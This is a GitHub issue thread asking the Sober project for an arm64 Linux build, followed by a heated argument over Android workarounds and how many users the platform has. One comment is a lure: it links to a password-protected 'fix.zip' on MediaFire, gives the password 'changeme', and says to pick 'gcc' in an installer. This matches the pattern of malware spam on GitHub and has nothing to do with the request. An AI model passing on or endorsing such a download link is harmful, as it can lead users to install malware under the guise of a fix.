### ISSUE TITLE
Arm64 support

### ISSUE THREAD

**Issue by thenameisluk** [vinegarhq/sober#166]
### Before Creating the Enhancement Request

- [X] I have confirmed that this should be classified as an enhancement rather than a bug/feature.

### Is your feature request related to a problem?

yes, lack of accesibility on specyfic platform

### Describe the Solution you'd Like

provide a build/support for arm64 linux

### Describe Alternatives you've considered

there aren't really any, x86 emulator would be really slow
can't find source code so can't really compile it myself

### Additional context

lack of support for arm64 prevents ppl on
- raspberry pi
- m1/m2/... macs with linux
- arm64 chromebooks

and other

from using this software. it likely shouldn't be that much work to compile it for arm64
it would be very appreciated if arm64 version was also provided
just like with minecraft bedrock launcher

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by KonoKore** [comment]
1. install android on pi
2. the scale of AsahiLinux is almost close to 0
3. ARM ChromeBooks can already run ROBLOX

**Comment by thenameisluk** [comment]
1. in that case project is pointless since everyone can just get waydroid, another solution on x86_64 just install windows :3 linux is 4% anyway
2. doubt u can measure that, again linux has only 4%, your project users or close to none in that scale
3. not really that simple, there are other arm64 laptops that run pure linux but ig these either aint big enough for you to care

if u really think it's not going to happen just close the issue, noone can force you to do anything
don't think anything productive will come out of this being open anyway

**Comment by KonoKore** [comment]
1. Sober runs the x86_64 Android version via a compatibility layer, with the way that Android is optimized, you get 2x the native performance than on windows, and before Vinegar was doomed to fail.
2. At least 90% and over of Linux users are on x86_64 hardware, that puts the percentage of Asahi Linux users down to 0.5%, and again, dealing with another architecture is a hassle
3. Again, same argument for number 2

As I am not a maintainer, you can close the issue yourself.

**Comment by Naymmmm** [comment]
Literally just install Android on your device and install Roblox.

**Comment by thenameisluk** [comment]
Just install windows
this project is pointless

**Comment by xXHaloEpicXx** [comment]
some people switched to linux because of the direction windows is headed, i made the jump before sober existed and it was a chore booting into windows every time i wanted to play roblox
sober solves this problem and gives players a means to play roblox on linux, free from the intrusivity and telemetry of windows
this project is not pointless, your comment is

**Comment by thenameisluk** [comment]
android is also somewhat getting rid of sideloading and it's not really a solution to this issue because **fyi arm doesn't mean can run android**

i don't care enough to have this issue open

for the 5 kids with 👎 pls learn to understand sarcasm 🙃
